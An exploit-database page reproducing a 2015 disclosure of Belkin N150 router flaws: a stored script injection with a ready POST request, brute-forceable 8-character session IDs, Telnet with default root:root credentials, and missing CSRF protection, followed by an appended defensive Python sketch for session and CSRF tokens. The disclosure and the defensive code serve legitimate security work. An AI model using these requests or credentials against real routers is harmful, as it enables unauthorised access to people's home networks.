0day.today - Biggest Exploit Database in the World.
Belkin N150 XSS / CSRF / Session Hijacking Vulnerabilities
##Full Disclosure:

#Exploit Title : Belkin N150 Wireless Home Router Multiple Vulnerabilities
#Exploit Author : Rahul Pratap Singh
#Date : 30/Nov/2015
#Home Page Link : http://www.belkin.com
#Blog Url : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Status : Not Patched

→ Vulnerability/BUG Report :

1)
• Vulnerability Title : HTML/Script Injection
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

The parameter "InternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language" is vulnerable.

https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/

→ Steps to Reproduce:

Send the following POST request using Burp Suite, etc.

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 260

%3AInternetGatewayDevice.DeviceInfo.X_TWSZ-COM_Language="><script>alert("1")</script><script>"&obj-action=set&var%3Apage=deviceinfo&var%3Aerrorpage=deviceinfo&getpage=html%2Findex.html&errorpage=html%2Findex.html&var%3ACacheLastData=U1BBTl9UaW1lTnVtMT0%3D

2)
• Vulnerability Title : Session Hijacking
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

The sessionid is allocated using hex encoding and is of fixed length, i.e. 8. Therefore, it is very easy to brute-force it in a feasible amount of time, as the session ID ranges from 00000000 to ffffffff.

→ Steps to Reproduce:

Send the following request using Burp Suite and brute-force the sessionid.

POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=deviceinfo&var:oldpage=-
Cookie: sessionid=7cf2e9c5; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT

3)
• Vulnerability Title : Telnet Enabled with Default Pass
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Vulnerability Details:

The Telnet protocol can be used by an attacker to gain remote access to the router with root privileges.

→ Proof of Concept:

https://0x62626262.wordpress.com/2015/11/30/belkin-n150-router-multiple-vulnerabilities/

→ Steps to Reproduce:

1) Open a terminal
2) Type the following command: telnet 192.168.2.1
3) The default user and pass is root:root

4)
• Vulnerability Title : Cross Site Request Forgery
• Version : F9K1009 v1
• Firmware : 1.00.09

→ Proof of Concept:

Requests do not contain any CSRF token. Therefore, requests can be forged. This can be verified with any request.

Status:
Vendor Notified: 20 Oct 2015
Vendor Notified Again: 25 Nov 2015

# 0day.today [2024-11-15] #
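
A defensive sketch for findings 2 and 4 above, added here as an example and not taken from the advisory or from the router's firmware: it computes the upper bound on a session ID's entropy, issues 128-bit IDs from the OS CSPRNG, and accepts a state-changing request only when it carries a CSRF token bound to a live session. `SessionStore`, `MIN_BITS` and the function names are hypothetical, and the 128-bit floor is an assumed policy value.

```python
import hashlib
import hmac
import math
import secrets
import string
from typing import Optional

MIN_BITS = 128  # assumed policy floor for this example; not a figure from the advisory


def max_entropy_bits(token: str) -> float:
    """Upper bound on a token's entropy, from its length and character set."""
    hex_only = all(c in string.hexdigits for c in token)
    return len(token) * math.log2(16 if hex_only else 64)


def is_guessable(token: str) -> bool:
    """True when the whole token space is smaller than the policy floor."""
    return max_entropy_bits(token) < MIN_BITS


class SessionStore:
    """Hypothetical server-side session table with session-bound CSRF tokens."""

    def __init__(self) -> None:
        self._key = secrets.token_bytes(32)  # server secret, never sent to clients
        self._live = set()

    def new_session(self) -> str:
        sid = secrets.token_hex(16)  # 128 bits from the OS CSPRNG
        self._live.add(sid)
        return sid

    def csrf_token(self, sid: str) -> str:
        # Bind the token to the session so it cannot be replayed in another one.
        return hmac.new(self._key, sid.encode(), hashlib.sha256).hexdigest()

    def accept(self, sid: str, csrf: Optional[str]) -> bool:
        """Allow a state-changing request only with a live session and its token."""
        if sid not in self._live or csrf is None:
            return False
        return hmac.compare_digest(csrf.encode(), self.csrf_token(sid).encode())


if __name__ == "__main__":
    # "7cf2e9c5" is the cookie value shown in the advisory: 8 hex characters.
    print(max_entropy_bits("7cf2e9c5"), is_guessable("7cf2e9c5"))
    store = SessionStore()
    sid = store.new_session()
    print(is_guessable(sid), store.accept(sid, store.csrf_token(sid)), store.accept(sid, None))
```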